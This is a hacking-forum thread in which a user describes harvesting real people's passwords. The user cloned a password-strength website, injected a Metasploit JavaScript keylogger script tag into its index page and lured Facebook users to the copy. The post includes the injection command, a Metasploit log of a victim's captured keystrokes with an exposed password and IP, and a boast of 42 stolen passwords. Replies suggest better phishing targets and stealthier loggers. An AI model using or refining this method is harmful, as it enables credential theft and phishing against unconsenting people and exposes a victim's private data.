Metasploit's javascript_keylogger

[z3ro]

Although I had discoverd the http_javascript_keylogger quite a long time ago, its only recently that I foung a rather effective way of using it - using it to harvest passwords.


Synopsis


-First, I used httrack to mirror the entire website http://howsecureismypassword.net/ onto my computer.

Code: [Select]

root@z3ro:~# httrack http://howsecureismypassword.net/
Mirror launched on Mon, 12 Aug 2012 17:10:19 by HTTrack Website Copier/3.43-9+libhtsjava.so.2 [XR&CO'2010]
mirroring http://howsecureismypassword.net/ with the wizard help..
Done.: howsecureismypassword.net/assets/fonts/League_Gothic-webfont.svg (27651 bytes) - OK
Thanks for using HTTrack!

-Next, I injected the javascript keylogger into the web page I had just copied.

Code: [Select]

root@z3ro:~# echo  "<script type="text/javascript" src="http://$IP:8081/log/NNRtKZNlErTh.js"></script>" >> /var/www/howsecureismypassword.net/index.html



-I then hosted the website on my computer using lighttpd and started the metasploit listener on port 8081. With my lighttpd running on port 80 and metasploit on port 8081, I forwarded the respective ports to make my website available from the internet.
-Everything was set on my side, I now only needed a 'victim'. And facebook proved to offer many.
-Convincing someone to 'check out' the website proved to be easier than expected.


Here's a preview from my last target:

Code: [Select]

Starting Metasploit
[*] Please wait while we load the module tree...




MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM






       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 916 exploits - 495 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops


demo => true
srvhost => 192.168.1.2
srvport => 8081
uripath => log
[*] Listening on 192.168.1.2:8081...
[*] Using URL: http://192.168.1.2:8081/log
[*] Server started.
[*] 197.225.238.119  http_javascript_keylogger - Assigning client identifier '0779c624'
[+] [0779c624] Logging clean keystrokes to: /root/.msf4/loot/20120805194327_default_197.225.238.119_browser.keystrok_771244.txt
[+] [0779c624] Logging raw keystrokes to: /root/.msf4/loot/20120805194330_default_197.225.238.119_browser.keystrok_134192.txt
[+] [0779c624] Keys: m
[+] [0779c624] Keys: me
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: me
[+] [0779c624] Keys: m
[+] [0779c624] Keys: p
[+] [0779c624] Keys: pa
[+] [0779c624] Keys: pas
[+] [0779c624] Keys: pass
[+] [0779c624] Keys: passw
[+] [0779c624] Keys: passwo
[+] [0779c624] Keys: passwor
[+] [0779c624] Keys: password
[+] [0779c624] Keys: passwor
[+] [0779c624] Keys: passwo
[+] [0779c624] Keys: passw
[+] [0779c624] Keys: pass
[+] [0779c624] Keys: pas
[+] [0779c624] Keys: pa
[+] [0779c624] Keys: p
[+] [0779c624] Keys: m
[+] [0779c624] Keys: me
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifier<CR>
[+] [0779c624] Keys: j
[+] [0779c624] Keys: jr
[+] [0779c624] Keys: jra
[+] [0779c624] Keys: jras
[+] [0779c624] Keys: jrast
[+] [0779c624] Keys: jrasta
[+] [0779c624] Keys: jrastam
[+] [0779c624] Keys: jrastame
[+] [0779c624] Keys: jrastamec
[+] [0779c624] Keys: jrastameck
[+] [0779c624] Keys: jrastamecka
[+] [0779c624] Keys: jrastameckay
[+] [0779c624] Keys: jrastameckays
[+] [0779c624] Keys: jrastameckaysha
[+] [0779c624] Keys: jrastameckaysh
[+] [0779c624] Keys: jrastameckayshal
[+] [0779c624] Keys: jrastameckaysha
[+] [0779c624] Keys: jrastameckaysh
[+] [0779c624] Keys: jrastameckays
[+] [0779c624] Keys: jrastameckay
[+] [0779c624] Keys: jrastamecka
[+] [0779c624] Keys: jrastameck
[+] [0779c624] Keys: jrastamec
[+] [0779c624] Keys: jrastame
[+] [0779c624] Keys: jrastam
[+] [0779c624] Keys: jrasta
[+] [0779c624] Keys: jrast
[+] [0779c624] Keys: jras
[+] [0779c624] Keys: jra
[+] [0779c624] Keys: jr
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j0
[+] [0779c624] Keys: j0k
[+] [0779c624] Keys: j0ks
[+] [0779c624] Keys: j0ksh
[+] [0779c624] Keys: j0ksh4
[+] [0779c624] Keys: j0ksh4s
[+] [0779c624] Keys: j0ksh4sh
[+] [0779c624] Keys: j0ksh4sh4
[+] [0779c624] Keys: j0ksh4sh4l4
[+] [0779c624] Keys: j0ksh4sh4l
[+] [0779c624] Keys: j0ksh4sh4l4e
[+] [0779c624] Keys: j0ksh4sh4l4ev
[+] [0779c624] Keys: j0ksh4sh4l4ev4
[+] [0779c624] Keys: j0ksh4sh4l4ev
[+] [0779c624] Keys: j0ksh4sh4l4e
[+] [0779c624] Keys: j0ksh4sh4l4
[+] [0779c624] Keys: j0ksh4sh4l
[+] [0779c624] Keys: j0ksh4sh4
[+] [0779c624] Keys: j0ksh4sh
[+] [0779c624] Keys: j0ksh4s
[+] [0779c624] Keys: j0ksh4
[+] [0779c624] Keys: j0ksh
[+] [0779c624] Keys: j0ks
[+] [0779c624] Keys: j0k
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j0
[+] [0779c624] Keys: w
[+] [0779c624] Keys: wi
[+] [0779c624] Keys: wis
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish u
[+] [0779c624] Keys: wish up
[+] [0779c624] Keys: wish up0
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a s
[+] [0779c624] Keys: wish up0n a st
[+] [0779c624] Keys: wish up0n a sta
[+] [0779c624] Keys: wish up0n a star
[+] [0779c624] Keys: wish up0n a sta
[+] [0779c624] Keys: wish up0n a st
[+] [0779c624] Keys: wish up0n a s
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0
[+] [0779c624] Keys: wish up
[+] [0779c624] Keys: wish u
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wis
[+] [0779c624] Keys: wi
[+] [0779c624] Keys: w
[+] [0779c624] Keys: a
[+] [0779c624] Keys: am
[+] [0779c624] Keys: amh
[+] [0779c624] Keys: amhg
[+] [0779c624] Keys: amhgw
[+] [0779c624] Keys: amhgws
[+] [0779c624] Keys: amhgwsd
[+] [0779c624] Keys: amhgwsdk
[+] [0779c624] Keys: amhgwsdkj
[+] [0779c624] Keys: amhgwsdkj.
[+] [0779c624] Keys: amhgwsdkj.c
[+] [0779c624] Keys: amhgwsdkj.ce
[+] [0779c624] Keys: amhgwsdkj.ced
[+] [0779c624] Keys: amhgwsdkj.cedv
[+] [0779c624] Keys: amhgwsdkj.cedvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/r
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rl
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ieo
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rl
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb
[+] [0779c624] Keys: amhgwsdkj.cedvhe/r
[+] [0779c624] Keys: amhgwsdkj.cedvhe/
[+] [0779c624] Keys: amhgwsdkj.cedv
[+] [0779c624] Keys: amhgwsdkj.cedvhe
[+] [0779c624] Keys: amhgwsdkj.ced
[+] [0779c624] Keys: amhgwsdkj.cedvh
[+] [0779c624] Keys: amhgwsdkj.c
[+] [0779c624] Keys: amhgwsdkj.ce
[+] [0779c624] Keys: amhgwsdkj.
[+] [0779c624] Keys: amhgwsdkj
[+] [0779c624] Keys: amhgwsdk
[+] [0779c624] Keys: amhgwsd
[+] [0779c624] Keys: amhgws
[+] [0779c624] Keys: amhgw
[+] [0779c624] Keys: amhg
[+] [0779c624] Keys: amh
[+] [0779c624] Keys: am
[+] [0779c624] Keys: a
[+] [0779c624] Keys: ab
[+] [0779c624] Keys: a
[+] [0779c624] Keys: abc
[+] [0779c624] Keys: abcd
[+] [0779c624] Keys: abcde
[+] [0779c624] Keys: abcdef
[+] [0779c624] Keys: abcdefg
[+] [0779c624] Keys: abcdefgh
[+] [0779c624] Keys: abcdefghi
[+] [0779c624] Keys: abcdefghij
[+] [0779c624] Keys: abcdefghijk
[+] [0779c624] Keys: abcdefghijkl
[+] [0779c624] Keys: abcdefghijklm
[+] [0779c624] Keys: abcdefghijklmn
[+] [0779c624] Keys: abcdefghijklmno
[+] [0779c624] Keys: abcdefghijklmnop
[+] [0779c624] Keys: abcdefghijklmnopq
[+] [0779c624] Keys: abcdefghijklmnopqr
[+] [0779c624] Keys: abcdefghijklmnopqrs
[+] [0779c624] Keys: abcdefghijklmnopqrst
[+] [0779c624] Keys: abcdefghijklmnopqrstu
[+] [0779c624] Keys: abcdefghijklmnopqrstuv
[+] [0779c624] Keys: abcdefghijklmnopqrstuvw
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwx
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwxy
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwxyz



That's it. His password was actually meinteraamplifier  and although the guy seemed to have enjoyed typing 'what-ever-he-felt-like-typing', I did get his passwd!


I have over 42 passwords now and I've concluded a success rate of about 87%


The human weakness factor is so much easier to penetrate than the network or server weaknesses. The attack is plain and simple, with no known problems with AV's.

[techb]

The method can be very effective and you played this off well. The only thing I would change is the site you mirrored. A place to get email addressees and or user names would be good too. I don't see a lot of people, especially smart people putting in their actual password. A lot of people know how to make secure password already.

Maybe a site that uses a Facebook login would be good. Also, checking the URL could stop would-be key logs.

Overall good job, it's a great start.

[Stackprotector]

I don't get the point why you would use metasploit for that. That will raise firewalls .

You can write a AJAX script who logs everything into a database of text file